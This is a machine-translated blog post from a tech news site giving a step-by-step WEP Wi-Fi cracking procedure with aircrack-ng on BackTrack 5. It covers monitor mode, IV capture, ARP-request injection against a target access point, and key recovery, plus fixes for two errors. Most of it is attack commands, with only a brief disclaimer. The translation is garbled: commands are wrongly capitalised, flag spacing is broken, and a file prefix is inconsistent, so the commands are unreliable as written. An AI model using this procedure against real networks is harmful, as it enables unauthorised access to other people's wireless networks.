In addition to Weibo, there is also WeChat
Please pay attention
WeChat public account
Shulou
2025-02-05 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >
Share
Shulou(Shulou.com)06/01 Report--
Recently, I inadvertently came into contact with some wireless technical data, and found a relatively fast wifi*** method. Although this is not as stable as reaver, I think it is much faster than reaver in terms of time. May be the reason why the notebook of the experiment is too old, there are several problems encountered on the way, if any colleagues encounter, please give me some advice. Write down the memos of these main commands here.
The environment is BT5, and a higher version is installed by default, so there is no need to upgrade, but the installation command is attached:
Wget http://download.aircrack-ng.org/aircrack-ng-1.0.tar.gz
Tar zxvf
Cd aircrack-ng-XXX
Make
Make install
Here is an example of WEP encryption:
Check the wireless network card, generally the default is wlan0, if there is an external or other wireless network card, then select the corresponding network card to enable.
View wireless card information separately: iwconfig
Enable wireless network card: ifconfig wlan0 up
Activate the Nic to monitor mode:
Airmon-ng start wlan0
Scan the wireless network information at the current location:
Airodump-ng mon0
Start grabbing the package, save it as the .ivs suffix of the logas prefix, and 6 is the channel of AP
Airodump-ng-- ivs-w longas-c 6 wlan0
When the previous command is running, open a new terminal window and enter the following command to inject ArpRequest into the target AP * *. In this way, a method called ArpRequest is used to read the ARP request message and forge a large number of messages to be sent again, so as to stimulate AP to generate more data packets, thus speeding up the cracking process.
Aireplay-ng-3-b AP-mac-h Client-mac mon0
When the IVS value is more than 20,000, you can try the following command to crack
IVS files captured by aircrack-ng
After the successful cracking, KEYFOUND! The ACSI code behind it is the password.
PS:
Question 1:
When entering airodump-ng-- ivs-w longas-c 6 wlan0 in a new window, an error was encountered:
Ioctl (SIOCSWMODE) failed: Device or resource busy
ARP linktype is set to 1 (Ethernet)-expected ARPHRD_IEEE802.11
AEPHRD_IEEE802.11_FULL or ARPHRD_IEEE80211_PRISM instead. Make
Sysfs injection support was not found either.
The way I try is to use the command:
Sudo ifconfig wlan0 downsudo iwconfig wlan0 mode monitorsudo ifconfig wlan0 upsudo iwconfig wlan0sudo airmon-ng start wlan0airodump-ng-- ivs-w longas-c 6 wlan0
That's it.
Question 2:
An error occurred during aireplay-ng-3-b AP-mac-h Client-mac mon0:
Couldn't determine current channel for mon0, you should either force the operation with-- ignore-negative-one or apply a kernel patch
Because this command does not directly affect the results, and has not found a suitable solution for the time being, if you have a good solution, please give us some advice.
Here is a simple list of the main commands used, only for experimental reference, must not be used for illegal operation, otherwise at your own risk.
Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.
Views: 0
*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.
Continue with the installation of the previous hadoop.First, install zookooper1. Decompress zookoope
"Every 5-10 years, there's a rare product, a really special, very unusual product that's the most un
© 2024 shulou.com SLNews company. All rights reserved.